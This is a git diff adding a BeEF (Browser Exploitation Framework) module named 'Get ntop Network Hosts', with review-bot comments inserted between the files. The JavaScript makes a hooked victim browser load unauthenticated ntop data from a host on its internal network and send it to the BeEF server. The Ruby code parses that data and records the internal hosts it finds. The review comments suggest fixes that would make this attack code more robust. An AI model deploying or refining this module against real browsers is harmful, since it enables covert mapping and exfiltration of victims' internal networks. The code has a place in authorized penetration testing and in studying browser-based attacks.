diff --git a/modules/network/get_ntop_network_hosts/command.js b/modules/network/get_ntop_network_hosts/command.js
new file mode 100644
index 000000000..54ff2c871
--- /dev/null
+++ b/modules/network/get_ntop_network_hosts/command.js
@@ -0,0 +1,35 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+
+ load_script = function(url) {
+ beef.debug("[Get ntop Network Hosts] Loading: " + url);
+ var s = document.createElement("script");
+ s.type = 'text/javascript';
+ s.src = url;
+ document.body.appendChild(s);
+ }
+
+ read_ntop = function() {
+ try {
+ var result = JSON.stringify(ntopDict);
+ beef.debug("[Get ntop Network Hosts] Success: Found ntop data (" + result.length + ' bytes)');
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto=http&ip=<%= @rhost %>&port=<%= @rport %>&data="+result, beef.are.status_success());
+ } catch(e) {
+ beef.debug("[Get ntop Network Hosts] Error: Did not find ntop");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=did not find ntop', beef.are.status_error());
+ return;
+ }
+ }
+
+ load_script("http://"+rhost+":"+rport+"/dumpData.html?language=python&view=long");
+ setTimeout("read_ntop()", 10000);
+
+});
+
diff --git a/modules/network/get_ntop_network_hosts/config.yaml b/modules/network/get_ntop_network_hosts/config.yaml
new file mode 100644
index 000000000..0212e9da5
--- /dev/null
+++ b/modules/network/get_ntop_network_hosts/config.yaml
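Review bot: `setTimeout("read_ntop()", 10000)` evaluates a string, which only works because `read_ntop` (and `load_script`) are assigned without `var` and therefore leak into the page's global scope; declare both with `var` and pass the function itself, `setTimeout(read_ntop, 10000);`. The `catch(e)` in `read_ntop` reports "did not find ntop" for any exception, including one thrown by `JSON.stringify` or `beef.net.send`, so including `e` in the `beef.debug` message would make the cases distinguishable. `result` is appended to the `data=` field unencoded; the parser in module.rb tolerates that only because `data` is the last field, which deserves a one-line comment such as `// data must stay the last field: module.rb matches it with (.+)\z`.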
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_ntop_network_hosts:
+ enable: true
+ category: "Network"
+ name: "Get ntop Network Hosts"
+ description: "This module retrieves network information from ntop (unauthenticated).
Tested on ntop v.5.0.1 on Ubuntu and v.5.0 Fedora RPM. This module does not work for ntop-ng."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/network/get_ntop_network_hosts/module.rb b/modules/network/get_ntop_network_hosts/module.rb
new file mode 100644
index 000000000..adf301ea1
--- /dev/null
+++ b/modules/network/get_ntop_network_hosts/module.rb
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_ntop_network_hosts < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
+ { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '3000' }
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&data=(.+)\z/
+ proto = $1
+ ip = $2
+ port = $3
+ data = $4
+ session_id = @datastore['beefhook']
+ type = 'ntop'
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found 'ntop' [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type)
+ end
+ data.to_s.scan(/"hostNumIpAddress":"([\d\.]+)"/).flatten.each do |ip|
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found host #{ip}")
+ BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip, :port => port)
+ end
+ end
+ end
+ end
+ end
+
+end
+
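Review bot: In `post_execute`, the inner loop passes the ntop service's own `port` to `NetworkHost.add` for every address scraped from `data`, so each discovered host is stored with a port that was never observed on it; if the model allows it, drop the argument: `BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip)`. The block parameter `|ip|` shadows the outer `ip`; renaming it (for example `|host_ip|`) removes the ambiguity. Everything matched here is supplied by the hooked browser and is untrusted on the server side: `ip` goes through `is_valid_ip?`, but `port` is only matched by `[\d]+` and is stored without a range check. Separately, `save` reads `@datastore['result']` while the parser reads `@datastore['results']`, and the success path in command.js sends no `result=` field, so the saved result may be empty on success, which is worth confirming.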